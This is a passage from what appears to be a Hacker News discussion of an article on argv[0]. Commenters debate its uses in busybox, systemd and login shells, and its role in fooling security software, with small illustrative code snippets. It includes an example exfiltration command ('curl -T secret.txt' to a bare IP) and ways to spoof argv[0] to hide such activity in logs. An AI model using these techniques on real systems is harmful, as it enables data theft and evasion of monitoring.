However, I am willing to consider the discussion about whether there could be merit to restricting the ability to write that value; I could imagine a system that populated it only from the actual file name and did not allow it to be written by the parent process or the child process at runtime. The obvious place this still falls apart is that an attacker could just
ln /bin/curl ./some\ other\ name
but there are sometimes security measures that we use even though they're less than 100% effective, so it is at least conceivable that this might be a trade-off worth making.
The real point is the security flaws in a calling program setting argv[0], because it really, really should be set by the operating system. (As a programmer, I shouldn't have to defend against these kinds of attacks. The OS should block it.)
The criticisms of valid programming practices, IMO, hurt the author's credibility and distract from the real point of the article.
argv[0] was designed to be part of the arguments to the program, and it succeeds perfectly at that task. The problem is that it has been abused by external tools as a way to identify the program just because there was no other alternative.
It has to be writable because the entire argv string (in program memory) is writable and declared as
int main(int argc, char **argv)
not int main(int argc, const char **argv)
and needs to preserve back-compat. Classic C code might be calling strtok on the arguments, so that block of memory needs to remain writable.
argv[0] should be used by any logging message that purports to report the program name, because argv[0] should be a string the human recognizes as something they invoked. Taking it away would break usability.
This does, of course, imply that the program name is non-constant untrusted data. Which means we shouldn't be making security software that depends on knowing that name.
I don't think that's the gist of the article, but the throwaway suggestion of 'just make lots of copies, who cares about diskspace' is insufficient and thus distracts. It's a single line about solutions in an article that isn't _about_ solving problems; it's about highlighting that a problem exists and that it's worth solving.
I read the article more as: There is __often__ no good reason to use argv[0], and it should be avoided if at all possible, and if it cannot be avoided, it would behoove the industry to work on ways to make sure in the future it can be avoidable.
For example, why in the blazes does windows taskman.exe list argv[0] in the GUI table view? That's just asking for trouble. Show the actual file path, and always an absolute one - that way you avoid confusion about which executable you're actually running, and it's just as readable if not more readable for every app _except_ those who care about argv[0], e.g. if you ran `/bin/dd` and it's actually busybox, in taskman you'd see `/bin/busybox` instead which'd be worse than seeing 'dd'. That is simple enough to solve (add an API call to update _your own process name_ or at least update your own process 'title' which interfaces like ps/taskman can use accordingly), but, now we're talking about coordinating between OS, glibc, busybox, and so on - lots of parties. I don't mind that the article doesn't delve that deep, as that wasn't the point of it. The point is simply to show the problems the kludge of 'we will show argv[0] instead of the executable name' causes.
This article feels more about explaining that in the distant past a mistake was made, with some history as to why that mistake was made and the deleterious practical effects that this mistake is causing or is likely to cause (most of them security related). It's not really about solving the problem; that presumably comes later and should be sketched out by those who are knowledgeable on _that_ subject. That doesn't imply the author is ignorant or that the article is insufficiently defended. Just that it hasn't covered all aspects of what it's writing about.
This was kind of in the middle of your complaint about windows, but then you've got unixy busybox discussion.
On a unix filesystem, a file that's hard linked with multiple names has no single 'actual name'. All of the names are equally valid. You could show the filesystem and inode number, which should uniquely identify the file, but is pretty user unfriendly.
Coding bugs into your programs is not a problem, it's a bug. None of the weird argv[0] examples can happen on the shell (without escaping), only when using system calls.
The more I read the article, the more I feel this is a reaction to a behavior the author did not expect; they fancy themselves smart, and therefore the last 20 years of usage of this feature are obviously wrong.
https://man.freebsd.org/cgi/man.cgi?query=setproctitle&aprop...
If so, then I disagree with the premise of the article, fundamentally. I don't see a problem. If someone is writing security software and doesn't already know about the mutability of argv[0], and doesn't know that (on Linux at least) /proc/$PID/exe is the only correct way to get the binary backing a process... well, then they have no business writing security software.
There is no problem here. The author is making a big deal about nothing, either because they have a weird axe to grind, or because they're ignorant.
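To make the /proc/$PID/exe point concrete, here is a minimal Python sketch (Linux only, since it reads procfs). The helper names `claimed_argv` and `backing_binary` are made up for illustration and do not come from any tool mentioned in this thread. It reads the two sources a monitoring tool could consult: the caller-controlled argument vector and the kernel's link to the loaded executable.

```python
import os


def claimed_argv(pid: int) -> list:
    """Return the argument vector as recorded in /proc/<pid>/cmdline.

    This is whatever the caller passed to exec, so argv[0] here is a claim,
    not a fact.
    """
    with open(f"/proc/{pid}/cmdline", "rb") as f:
        raw = f.read()
    # Arguments are NUL-separated, with a trailing NUL after the last one.
    return [part.decode(errors="replace") for part in raw.split(b"\0")[:-1]]


def backing_binary(pid: int) -> str:
    """Return the path of the executable the kernel actually loaded."""
    return os.readlink(f"/proc/{pid}/exe")


# Inspect the current process as a harmless example.
me = os.getpid()
print("argv says:         ", claimed_argv(me))
print("/proc/PID/exe says:", backing_binary(me))
```

Reading another user's /proc/PID/exe usually needs matching privileges, so a real tool would also have to handle permission errors.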
There are numerous reasons why this is not desirable, for example knowing whether an application was called from one symbolic link or a relative path dictates what that application's working directory is.
You could argue the mistake was done elsewhere so this feature could be abused.
We could call it setproctitle, or something. \s
$ echo '#!/path/to/busybox echo' > myecho
$ chmod +x myecho
$ ./myecho 123
./myecho 123
Right now this doesn't work properly, because "./myecho" (argv[0]) gets placed into argv[2] of the process. Otherwise, this technique IMHO is better than symlinks:
- Each applet uses the same amount of disk space (0 blocks, i.e. the content fits into inode).
- Doesn't read or write to argv[0].
- You could finally rename the applets. This is not that useful if busybox is your only posix userspace implementation, but very useful if you want many implementations to live side-by-side. E.g. on macOS, I'd like to have readlink point to BSD/macOS's readlink, greadlink to GNU coreutil's, bbreadlink to busybox's.
But as I said, this doesn't work for now. The best you can do now is to write shell two-liners https://news.ycombinator.com/item?id=41436012. Some such two-liners may also fit into the inode inlining limit, so that's a plus. But you will pay a performance penalty on every call (since sh needs to start up).
Is that really the case? AFAIK, OpenWRT uses SquashFS by default, and a quick web search tells me that "[...] In addition, inode and directory data are highly compacted, and packed on byte boundaries. Each compressed inode is on average 8 bytes in length [...]" (https://www.kernel.org/doc/html/latest/filesystems/squashfs....). That is, even if the content fits into the inode, it will make the inode use more space (they're variable-size, unlike on traditional filesystems with fixed-size inodes).
And using hardlinks (traditionally, we use hardlinks with busybox, not symlinks) goes even further: all commands use a single inode, the only extra space needed is for the directory entry (which you need anyway).
Finally, symlinks can be relative, while the solution you proposed is not. This is particularly useful for distributing software, e.g. distributing a tar file with the busybox itself and their symlinks.
In fact, you don't even need symlinks at all: you can even have hard links, that could even save disk space on embedded filesystems, that are readonly images anyway.
#!/bin/sh
busybox "$0" "$@"
and then every command required could just be a hardlink to the same script, instead of replicating it over and over again for hardcoded command names.
Then I realised the whole point is to posit a world where $0 doesn't exist, and we're not allowed to be clever about it.
If there really is a need for having one executable that comprises multiple commands, is `busybox whoami` instead of `whoami` so much more effort? To me, that would make more sense in terms of what is going on; aliases could be used if one-word commands are preferred. In most non busybox contexts, argv[0] is just an unnecessary addition that, as the linked article shows, can introduce weirdness.
It's clear from the comments there are still many who think argv[0] is a good thing, which is great - I'm glad the post sparked this debate.
It's not the "more effort" that is the deal breaker here. It is a matter of compliance with specs and user expectations. What you're suggesting would make Busybox very non-POSIXy, very non-Unixy. All scripts written over the last many decades would need to be updated to call `busybox ls` instead of `ls`? How is that a viable solution?
> I'm glad the post sparked this debate.
This is a very strange way to deflect concerns about quality of the article!
Shell aliases don't solve all problems, even if you do:
alias rm="busybox rm"
alias xargs="busybox xargs"
# etc.
you still have to write `xargs busybox rm`, because xargs won't use the shell alias.
But the main problem with this approach is that POSIX and LSB require certain binaries to be available at certain paths. When they're not, most shell scripts will just break.
The minimal standard solution is probably to create shell scripts for all of these, e.g. in /bin/ls:
#!/bin/sh
exec /bin/busybox ls "$@"
But this both adds runtime overhead (on every invocation!) and is quite wasteful in terms of disk space. Busybox boasts over 400 tools. At 4 KB per file, that's about 1.6 MB of just shell scripts. Of course that can be less if the file system uses some type of compression, which is common on embedded systems where storage space is small, but it still seems to defeat the purpose of using busybox to create a minimal system.
I really don't think it is a debate. The usage of argv[0] is massively understated by the article. Just go look at gcc or any modern-day compiler. It's used so much that the conversation about whether we should has been hashed out by many different groups, yet they still chose to implement it.
The security concerns are a non-issue, as argv[0] was not the problem. It was the lack of technical knowledge of how systems work and a flaw in the security application.
Bash has an sh compatibility mode that runs when you invoke it as sh.
What do you do? Replace every single occurrence of each command by prefixing it with `busybox`? Not ideal at all...
You appear not to realize that busybox is an essential component of a POSIX like system.
Not that it couldn't be fixed by changing how we handle login shells but still. Worth remembering.
Similarly the busybox situation could be solved by having busybox ship posix shell wrapper scripts which use `#!/bin/busybox sh` as the shebang and simply consist of a line like `exec /bin/busybox ls "$@"`.
- symlink
- hardlink
- shell script wrappers
- executable binary wrappers around libbusybox
edit: basically login(1) execs your shell with - prepended, so that's an example where POSIX expects this
I think any reasons one will find are based on backwards compatibility.
One good use for it is to make a guess as to where your executable is installed. Yes, it would be nice if there were a more certain way to get that... but not for security purposes. You don't want to rely on filenames for security anyway, because anybody can make copies and symlinks and rename files at will, and it's really, really hard to catch all the cases of that. Much harder than, for instance, remembering that argv[0] is a hint from your caller, not gospel from the OS.
In the same way, I know that it's fashionable nowadays for incompetent idiots to write security tools, but a security tool that trusts an argv value for anything much was obviously written by an incompetent idiot, because that's not what they're for.
Android does this for most common shell commands. Toybox and busybox are examples of such implementations.
I don’t see why not. It’s allowed to behave differently based on the arguments that follow it. I personally think the genericity of including the program name itself as one of its own calling arguments is really meta cool.
It's also certainly better from a readability standpoint to have `Remove-Item` rather than `rm` in a script.
Likewise, I would much rather type `ls -Al` rather than `ls --almost-all --long-listing` (N.B. --long-listing is not the long option for -l, -l has no long option, I just made up an appropriate name) when listing a directory but would probably appreciate the long form in a script.
I think just like we have long options and short options, it would be helpful to have long commands and short commands.
After all, it's 50% faster to type a two-letter acronym than a TLA.
https://media.wired.com/photos/59327efdf682204f73696446/mast...
/e
A program should be sandboxed from its environment, including how the user started it. How a user names and organizes his files is a matter between the user and the operating system, not something individual program should care about.
Repeating the OP, your program takes every other parameter from the caller, why do you insist on the executable name to not be set by him too?
Windows defender is the one that is stupid by using it. Every OS has the real executable name in some place, security software should look there instead.
- Decompressing and inflating a compressed binary block with a generic decompressor at the top (e.g. a bash or python script with a binary blob at the end)
- Checksumming its own executable (skipping the checksum string) to resist virus infection. Not bulletproof but viruses aren't usually smart enough to circumvent this
The busybox argument or shutdown/reboot explains why the name of a symlinked binary is helpful as argv[0]. But does the busybox/shutdown case explain why the execv lets the user set the argv[0] value to anything other than what the path says?
That's missing the point, I think.
The real question here is, is the name of a program really an argument to the program, from the user's perspective? I certainly don't blame users that disagree. It's more difficult for them to change argv[0], and the fact that this is possible is not necessarily obvious to them, nor to their users.
If it helps, think of it like this: imagine the file timestamp was similarly passed as argv[-1]. And that the file inode number was passed as argv[-2]. Would it make sense to change behavior on those too?
When I use busybox [invisibly to me], I sure care that it knows whether I called it as "ls" or as "rm" and that it does the operation that I asked it to do.
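For anyone who hasn't looked at how a multi-call binary decides what to do, here is a rough Python sketch of the idea. It is not busybox's actual code; the applet names `hello` and `count` and the `dispatch` function are invented for the example. The applet is chosen from the basename of argv[0], with a fallback to the first real argument for the `busybox whoami` style of call.

```python
import os


# Hypothetical applets; a real multi-call binary has hundreds of these.
def applet_hello(args):
    return "hello " + " ".join(args)


def applet_count(args):
    return str(len(args))


APPLETS = {"hello": applet_hello, "count": applet_count}


def dispatch(argv):
    """Pick an applet from argv[0], or from argv[1] when called by a generic name."""
    name = os.path.basename(argv[0]) if argv else ""
    args = list(argv[1:])
    if name not in APPLETS and args:
        # Invoked as e.g. `multicall hello world`: the applet is the first argument.
        name, args = args[0], args[1:]
    if name not in APPLETS:
        raise SystemExit(f"{name or '?'}: applet not found")
    return APPLETS[name](args)


# Called through a link named "hello", then through the generic name.
print(dispatch(["/usr/bin/hello", "a", "b"]))
print(dispatch(["multicall", "count", "x", "y", "z"]))
```

Both styles end up in the same table lookup, which is why the symlink form costs nothing extra at runtime.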
For the former, I don't see how this goes against modern principles - in presence of symlinks, it is pretty reasonable to want to know both "how was this program called", as well as "what's the actual executable we ended up with". And this does more than just giving multiple names to same program - for example python uses argv[0] to tell if it's inside virtualenv and adjust search paths accordingly. This makes it appear like there are multiple python installs on system, with no extra disk space taken.
For the latter, yes, programs can have bugs and OSes can have non-obvious semantics, and if you are security software, it's very important to be aware of them. I would not mark "argv[0]" as something especially bad from a security perspective. All the author's examples would still be possible in a hypothetical world where argv[0] is set by the system - as nothing stops a user from creating a symlink in a temporary dir with a deceiving name (spaces and quotes are OK in filenames!) and exec'ing it directly. Instead, fix your security software so it quotes argv values?
And the key witness is systemd, which is too young to buy a beer - even in Germany.
Most people use argv[0] so they can do something like:
$ mycommand help
Type `mycommand foo bar` to foo bars.
$ mycommand1.2.3 help
Type `mycommand1.2.3 foo bar` to foo bars.
This is admittedly less fun when mycommand is `/home/jrockway/.cache/bazel/_bazel_jrockway/7f95bd5e6dcc2e75a861133ddc7aee82/execroot/_main/bazel-out/k8-fastbuild/mycommand/mycommand_/mycommand` however.
I seem to recall there was a language that only provided the stripped part - but I guess my memory is failing me here. Sorry for the wrong information above.
Try running `ls -li /usr/bin` on macOS and you might be surprised to learn that all of these are a single executable: DeRez, GetFileInfo, Rez, SetFile, SplitForks, ar, as, asa, ... yacc. There's 77 different entries in `/usr/bin` (including `git` and `python3`) that are all links to the same binary (`com.apple.dt.xcode_select.tool-shim`). It's a wrapper that implements the `xcode-select` concept to locate and run the real executable provided by either the Command Line Tools package or a particular Xcode version you may have installed.
And that's not the only one. There's another 68 links starting with `binhex.pl` and ending with `zipdetails` that are a single 811 byte wrapper-script around perl.
Altogether, I see that there are 26 different names that are multiply linked:
ls -li /usr/bin |
awk '{print $1}' |
sort | uniq -c |
sort -n | grep -v "\s*1\s" | wc -l
Some of the other examples: less & more, bc & dc, atrm & batch, stat & readlink.
Having a program behave dynamically based on argv[0] is a useful tool in the Unix toolbox. The alternative would be compiling 77 different versions of `tool-shim`, creating 68 different versions of that perl wrapper, etc.
The `git` binary uses this concept too. You can create an executable named `git-foo`, put it anywhere in your PATH, and then call it as `git foo`.
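The lookup side of that `git foo` convention can be approximated in a few lines of Python. This is only a sketch of the naming scheme described above, not git's real resolution logic; `find_subcommand` and the `mytool` name are hypothetical.

```python
import shutil
from typing import Optional


def find_subcommand(tool: str, sub: str, path: Optional[str] = None) -> Optional[str]:
    """Return the full path of an executable named `<tool>-<sub>`, or None.

    `path` is a PATH-style string; when None, the PATH environment
    variable is searched, as shutil.which does by default.
    """
    return shutil.which(f"{tool}-{sub}", path=path)


# `mytool foo` would look for an executable called `mytool-foo`.
print(find_subcommand("mytool", "foo"))
```

A dispatcher built this way would exec the returned path with the remaining arguments, so third parties can add subcommands without touching the main binary.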
In the end, argv[0] is just an argument that can be used to improve CLI ergonomics and reduce code duplication. It's not solely about disk space. I think that makes it a more common and useful concept than you give it credit for.
As to the rest of the post: I'm not really sure how argv[0] being in the caller's control is any different than the rest of the execution context being in the caller's control: the remaining arguments, the environment, limits on file descriptors, which file descriptors are open, the program's real and effective uid and gid, signals it might receive and so on. These all amount to untrusted input any executable has to be cognizant of, more or less so depending upon what privileges the executable has and what its goals are.
As a result, the author has such strange, absolute positions, calling it a legacy that should be abolished (only tangentially knowing some actual use cases), or that strange quote about design principles.
Despite all the talk about security, the whole debacle that argc can be 0 (and argv[0] can be NULL), is completely left aside. This has caused actual security issues quite recently[1].
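Since an empty argument vector is possible, code that reports its own name arguably should not index argv[0] blindly. A small defensive sketch in Python follows; the function name and the "unknown" fallback are my own choices, not taken from any project discussed here.

```python
import os


def program_name(argv, fallback="unknown"):
    """Basename of argv[0], tolerating an empty argv or an empty argv[0]."""
    if not argv or not argv[0]:
        return fallback
    # A value such as "dir/" has an empty basename, so fall back there too.
    return os.path.basename(argv[0]) or fallback


print(program_name([]))                  # unknown
print(program_name(["/usr/bin/mytool"]))  # mytool
```

The same check in C would be testing `argc > 0 && argv[0] != NULL` before touching argv[0].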
Unfortunately, the author shot their credibility in the foot by perseverating on use of argv[0]; instead of glossing over it and getting to the point.
"legacy" -> anything that has existed for more than a day that I don't understand and don't like that stops me from poorly reinventing the wheel
"modern" -> anything that I dreamt up or heard some other hipster talk about recently that I got hyped about
1) Oh no, the only protection is looking at argv[0]. What kind of clown software is that? Software that notably runs on an already compromised system..
2) No need for argv[0] to fool software that concats argv values with spaces: just run 'curl -o "test.txt |grep" 1.1.1.1'
3) A long argument messes up telemetry? Let's hope that bucket doesn't have more holes.
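Point 2) is easy to demonstrate, and so is the fix on the logging side. A minimal Python sketch using the standard library's `shlex` module, with the argument list taken from the example in 2):

```python
import shlex

argv = ["curl", "-o", "test.txt |grep", "1.1.1.1"]

# Joining with bare spaces loses the argument boundaries.
naive = " ".join(argv)

# Shell-style quoting keeps every argument distinguishable.
quoted = shlex.join(argv)

print(naive)   # curl -o test.txt |grep 1.1.1.1
print(quoted)  # curl -o 'test.txt |grep' 1.1.1.1

# The quoted form can be parsed back into the original list.
assert shlex.split(quoted) == argv
```

The naive line looks like a pipeline into grep even though no pipe was ever involved, which is exactly the confusion a log reader would hit.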
Isn't this contradicted by the docs? CreateProcess receives lpApplicationName and lpCommandLine, and they can be different.
> If both lpApplicationName and lpCommandLine are non-NULL, the null-terminated string pointed to by lpApplicationName specifies the module to execute, and the null-terminated string pointed to by lpCommandLine specifies the command line. The new process can use GetCommandLine to retrieve the entire command line. Console processes written in C can use the argc and argv arguments to parse the command line. _Because argv[0] is the module name, C programmers generally repeat the module name as the first token in the command line._
int execv(const char *path, char *const argv[]);
The argument path points to a pathname that identifies the new process image file.
The argument argv is an array of character pointers to null-terminated strings. [..] The value in argv[0] should point to a filename string that is associated with the process being started by one of the exec functions.
Windows does not allow you to do that, AFAIK.
[1]: https://pubs.opengroup.org/onlinepubs/9699919799/functions/e...
It does though, using the lpCommandLine parameter to CreateProcess as I said.
CreateProcess("main.exe", "foobar", ...)
argv[0] is "foobar"
No, it doesn't make software less predictable, nor does it go against modern design principles. argv has very handy use cases and can be used to provide a better user experience.
Unless you have evidence to back up your claims, you're just turning a subjective opinion to an objective one without any merit.
Either way, it's software developer choice and irrelevant to the user as much as it is irrelevant to the user whether the developer prefers for(;;) over while(1).
On desktop machines, perhaps, but this is certainly not true on all platforms Linux runs on.
Tell me why a simple calculator app needs more memory than a complete multi-server implementation of the IRC protocol (including SSL/TLS), not to mention a full scripting engine.
But of course this much more of an issue for embedded platforms like routers with OpenWRT.
The author's just dumb.
Busybox says hello.
Seriously though, how is this on the front page? Both the premise and conclusions contradict the reality of how argv[0] is used with symbolic links and hard links.
extern char *__progname;
which holds the program name without the (optional) invocation path in front of it. Basically the last path component of argv[0].
And neither the want-it nor the don't-want-it case is such an outlier that you can disregard and not serve that case.
Sometimes you're talking to the user about general usage and the full path is a distracting detail and not the important part of the message.
Sometimes the full path and truthful invoked filename are an unnecessary security disclosure like telling a web viewer details about the server.
Sometimes the full path and truthful invoked filename is a necessary fact in debugging, or in errors, or even ordinary non-error logs that aren't public.
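Serving both cases does not take much. A small Python sketch, where `display_name` and `usage` are hypothetical helpers: the short form is the last path component of argv[0] (what `__progname` holds), and the full invoked path is kept for debug output.

```python
import os


def display_name(argv0: str, verbose: bool = False) -> str:
    """Short name for user-facing text, full invoked path for debug logs."""
    return argv0 if verbose else os.path.basename(argv0)


def usage(argv0: str) -> str:
    """Usage line that echoes the name the user actually typed."""
    return f"usage: {display_name(argv0)} [--some-arg] FILENAME"


print(usage("/opt/tools/bin/mycommand"))
print(display_name("/opt/tools/bin/mycommand", verbose=True))
```

Which form goes where (public error text, private logs) is a policy decision for the program, not something the sketch tries to settle.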
Says who? I'm not aware of any modern design principles that say anything about this sort of thing.
> argv[0] is ignored (mostly)
Pretty much any program I've written that has a --help option uses argv[0] to print out the usage string, i.e.:
printf("%s [--some-arg] FILENAME\n", argv[0]);
> First off, argv[0] can be used to fool security software
Then that security software is poorly written. On Linux, the correct way to find the binary of a running process is by calling readlink(2) on /proc/$PID/exe. Assuming security software like this is going to have a lot of OS-specific code, it seems fine to me to expect they use it (and then have to do other things on other OSes).
> Another argument against this design is that if you have two programs that are so similar that it pays off to consolidate them into a single file, is there really a need for two separate programs/program names?
The author is talking about shutdown and restart being symlinks to systemctl on systemd-based systems. But what about something like busybox? busybox contains hundreds of programs, all conveniently in a single, statically-linked binary. On my system it's about 800kB. While I agree that even 250MB is not a big deal for most systems these days, it certainly is a problem for, say, a WiFi router that only has 8MB of flash.
> Ultimately, nobody wants to be bothered by argv[0].
False. I find it useful, and am not "bothered" by it at all. And I suspect security folks aren't really bothered either: the ones that actually know what they're doing look at /proc/$PID/exe when they want to find the binary backing a PID.
This article is kinda lame, and it seems like the author's objections are mostly based on ignorance.
This is not an argument at all, this is a statement that arguments exist. What are they?
It's like saying we shouldn't do something because it's "against best practices". I'm asking why are other practices preferred...
It's probably a good idea to not have it settable to other values by the invoking process, as is generally the case on Windows (ignoring its Posix subsystem here).
Well, there is a use case where I sometimes set argv[0]. Consider that you want to run yourself as a subprocess. Why would you want to do that? There are plenty of reasons, but in general the thing is that doing things after a fork() is not safe under some circumstances, and thus sometimes you also want to exec yourself.
A technique is to then call yourself using another name in argv[0], so that main takes a different flow from the normal command line parsing, without adding an argument that the user could specify if they knew it existed.
Yes, I know that there are a ton of other methods to do the same thing (perhaps an environment variable, for example), but I find the method of argv[0] quite nice and simple to be fair.
# Inside your container:
$ flatpak --version
zsh: command not found: flatpak
# Have host-spawn handle any flatpak command
$ ln -s /usr/local/bin/host-spawn /usr/local/bin/flatpak
# Now flatpak will always be executed on the host
$ flatpak --version
Flatpak 1.12.7
I am able to tell the symlink name by reading argv[0] to know which command to run. It is such a powerful and neat UNIX trick that has no simple alternative (in this example one would have to write ad-hoc shell scripts for each command they want to run).
Solution: we should not use argv[0]?
While argv[0] is old, if you had to design it from scratch today, it would still be a good idea to have the program invocation name as an argument.
The idea that anything old must be a historic quirk that we can eliminate today is flawed.
Now argv[0] should not be relied upon for obtaining the executable name, except as a last resort if the program is built for platforms that don't have anything else. But if one executable has multiple program names via symlinks, only argv[0] will distinguish them.
It's ridiculously useful aside from the obvious busybox style usage.
It's huge to be able to have a pointer to the directory where the executable resides, so you can package other assets alongside it and have it all work for free without a separate configuration file or env variables etc.
Or for debugging or even non-error logging. You might call a binary from more than one place by other means than symlinks or hard links. You might be running from different mounted filesystems, chroot or container environments etc. A symlink might be in the middle of the path and not the executable name itself. Similarly a mount point.
It's just a random small useful tool like all others. Calling it some kind of security problem is like saying that screwdrivers are a security problem because aside from turning screws, some people can use screwdrivers to stab people, and we have nut drivers which can serve almost all the same needs for only a little extra work.
If your context of the moment means you have a security concern where you shouldn't trust this bit of data as gospel for some reason, then don't. Treat it like user input and take whatever precautions and fallback measures and sanity checks make sense for you in whatever particular situation you are in.
F-ing dumb.
Yes! I was surprised how far down I had to scroll to find somebody mentioning that one.
How else can you write a reasonably robust script that actually, you know, does something? You almost always need to grab some known files by their paths relative to the script.
Some languages don't provide a better solution but they should. For Bash there is ${BASH_SOURCE[0]}. For compiled executables you use OS-provided functions like GetModuleFileName(NULL, ...) on Windows and readlink("/proc/self/exe", ...) on Linux.
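The same "resolve the real location, then look next to it" pattern can be sketched in Python. `install_dir` and `asset_path` are illustrative names, and the file names in the usage comments are placeholders.

```python
import os


def install_dir(invoked_path: str) -> str:
    """Directory holding the real file behind `invoked_path`, symlinks resolved."""
    return os.path.dirname(os.path.realpath(invoked_path))


def asset_path(invoked_path: str, name: str) -> str:
    """Path of a file shipped alongside the real script or executable."""
    return os.path.join(install_dir(invoked_path), name)


# Typical use from a script:
#   asset_path(__file__, "defaults.conf")
# For the running interpreter or binary on Linux:
#   install_dir("/proc/self/exe")
```

Resolving symlinks first matters when the program is started through a link in some bin directory, because the assets live next to the target, not next to the link.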
A good language spec is laid out in a way that reads from front to back with minimized circularity. See Common Lisp, Java, Python, etc.
As a kid in high school checking out Unix manuals and implementing many Unix tools in
https://subethasoftware.com/2022/09/27/exploring-1984-os-9-o...
I struggled with K&R because of the circularity of the book, which was really an anomaly built into C, the culture of C, or both, because C++ books still read this way. C had so many half-baked things, such as an otherwise clean parser that required access to the symbol table. And of course a general fast-and-looseness which led to the buffer overflow problem.
There were other languages which failed to solve the systems programming problem like PL/I and Ada, not to mention ISO Pascal which could have tried but didn’t. (Turbo Pascal proved it could have been done.)
People took until 1990 or so to be able to write good language specs consistently, so we can forgive Unix but boy is it awful if you look closely at it. On the other hand, IBM never did make a universal OS for the “universal” 360, yet Unix proved to be adaptable for almost everything.
And as for IBM, I managed to use all sorts of OSs in VMs on IBM hardware back in the 1980s. Which did you have problems with?
typedef int myint;
myint x;
which is unusual among programming languages. Sure, I used VM on IBM hardware in the 1980s and it was great. I also used timesharing systems on the PDP-8 (what atrocious hardware!), the PDP-11 and the PDP-10/20 in the 1970s. Although the 360 was superior in so many respects (except for the slow interrupt handling), it failed to break into the huge market for general-purpose timesharing to support software development and such (learning BASIC) until the time microcomputers came along and crushed the timesharing market. (PDP-10 was famously used to develop microcomputer software such as the original Microsoft BASIC and Infocom's z-machine games.)
Fred Brooks' project to develop an OS for the 360 was notoriously troubled and IBM belatedly turned to VM as a dark horse. Today it looks ahead of its time (as virtualization became mainstream on x86 in the 00's) but back then IBM was flailing and they wound up with a good software story by accident. It was not really their fault, people just didn't know how to make an OS and the most advanced thinking back then was monstrosities like MULTICS. It was Unix and VAX/VMS that pointed to what a general purpose OS would look like a few years later and there has been relatively little innovation since then because nobody can afford to rearchitect the user space. (e.g. no way you can take out the "bloat" because you'll have to put it back in to run the software you want)
IBM's z-architecture (the other z) has a great software story today (even runs Linux) but it was not the Plan A or even the Plan B.
Seems like this security software is broken, not argv[0]
I'm fascinated by the intersection of argv[0], and the execve behavior of replacing the calling program with the called one.
Aside from that, I quite like argv[0], for a much more limited set of reasons than considered in this interesting and comprehensive article. I like the ability to "retitle" a process to put a useful, descriptive, or branded name in there to be seen by ps, et al.
NodeJS also exposes this feature, but not quite as you might expect. Whereas in C, setting argv[0] from within the program's execution context will alter what is observed by ps, in NodeJS process.argv is just a descriptive getter. Setting its slots has no effect outside of its context.
But this is where process.title steps in. Setting process.title allows you to (in an OS-dependent way) change the name reported in ps and similar tools.
Read more here: https://nodejs.org/api/process.html#processtitle
Please don't kill argv[0], its lease hath all too short a date
https://linux.die.net/man/3/execve
If you already know about the additional man pages beyond user space, I cannot recommend diving into them strongly enough. Additionally, the GNU 'info coreutils' is a good place to start, as well as the glibc manual.
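For anyone who has not looked at execve before: the path of the file to run and the argv array are separate parameters, so the caller is free to put anything in argv[0]. Here is a minimal Python sketch of that, using the `executable=` parameter of `subprocess.run`. The helper name `run_with_argv0` and the fake name are made up for illustration, and it assumes /bin/sh is a conventional shell such as dash or bash (a multi-call binary like BusyBox would itself dispatch on the fake name and refuse to run).

```python
import subprocess


def run_with_argv0(argv0: str) -> str:
    """Run /bin/sh under a caller-chosen argv[0]; return what the child sees as $0."""
    result = subprocess.run(
        [argv0, "-c", 'printf "%s" "$0"'],  # first element becomes the child's argv[0]
        executable="/bin/sh",               # the file that is actually executed
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout


if __name__ == "__main__":
    # The child is /bin/sh, but it reports whatever name the parent chose.
    print(run_with_argv0("totally-not-a-shell"))
```

Nothing in the call checks that the name matches the file, which is the whole point of the thread.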
This is still very much an issue. For the shutdown and reboot case, the main reason those symlinks exist is for backwards compatibility for existing programs and scripts (and muscle memory) that assume there is a shutdown or reboot command, and compatibility with systems that don't use systemd.
Another way to do that could be to use a shell script that execs systemctl, but that requires a separate intermediate shell process, which may have its own compatibility issues.
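To make the symlink approach concrete, here is a rough Python sketch of how a multi-call tool might pick its behavior from the name it was invoked under. The alias table and the function name `resolve_command` are hypothetical and much simpler than what systemctl really does; it only illustrates the dispatch-on-basename idea.

```python
import os

# Hypothetical alias table: invocation name -> subcommand it stands for.
ALIASES = {"reboot": "reboot", "poweroff": "poweroff", "halt": "halt"}


def resolve_command(argv):
    """Return [subcommand, *args] based on the name the tool was invoked as."""
    name = os.path.basename(argv[0])
    if name in ALIASES:
        # Invoked through a compatibility symlink: the name is the subcommand.
        return [ALIASES[name]] + list(argv[1:])
    # Invoked under the real name: the subcommand is the first argument.
    return list(argv[1:])


if __name__ == "__main__":
    print(resolve_command(["/usr/sbin/reboot", "--force"]))
    print(resolve_command(["systemctl", "status", "sshd"]))
```

No extra process is needed here, which is the advantage over the wrapper-script alternative.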
Another use of argv[0] that isn't discussed at all is putting a hyphen at the beginning of argv[0] for login shells. For example if bash is invoked as the login shell argv[0] is "-bash". That probably wasn't a great design decision, but changing it now would probably cause a lot of breakage.
For most other things, definitely unnecessary.
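The login-shell convention mentioned above is easy to sketch. This is only an illustration of the leading-hyphen check in Python, with made-up helper names, not how any particular shell implements it.

```python
import os


def is_login_shell(argv0: str) -> bool:
    """By convention, a leading '-' in argv[0] marks a login shell."""
    return argv0.startswith("-")


def shell_name(argv0: str) -> str:
    """Strip the login marker (if any) and any directory part."""
    if argv0.startswith("-"):
        argv0 = argv0[1:]
    return os.path.basename(argv0)


if __name__ == "__main__":
    for candidate in ("-bash", "/bin/bash"):
        print(candidate, is_login_shell(candidate), shell_name(candidate))
```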
Is it only speaking against `argv[0]` or `argv` in general?
What is the proposed solution, if any?
What about `__progname`? The only issue here is that if `argv[0]` is a path, then `__progname` is only the filename. What if I want the path?
Summary: By manipulating argv[0], a malicious program can hide what it's doing in security logs. For example, a malicious program can make "curl -T secret.txt 123.45.67.89" look like "curl localhost | grep -T secret.txt 123.45.67.89" in security logs. A malicious program can also use very large argv[0] values as a DoS attack on system logging, or to truncate malicious arguments.
IMO, operating systems should block this practice.
Unfortunately, the author's extensive criticism of programs reading argv[0] hurts the author's credibility before most people get to the real point of the article.
The "look like" is not a problem with the OS but a problem with displaying an array as a space-separated string without sufficient quoting or escaping, making things ambiguous.
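A quick Python sketch of the quoting point, using the argv from the curl example: joining on spaces loses the element boundaries, while `shlex.join` (standard library, Python 3.8+) keeps them visible. The function names are just for illustration.

```python
import shlex

# argv[0] has been set to a misleading string by the caller.
SPOOFED_ARGV = ["curl localhost | grep", "-T", "secret.txt", "123.45.67.89"]


def render_naive(argv):
    """What a log line looks like if the array is joined on spaces."""
    return " ".join(argv)


def render_quoted(argv):
    """Shell-style quoting keeps each array element unambiguous."""
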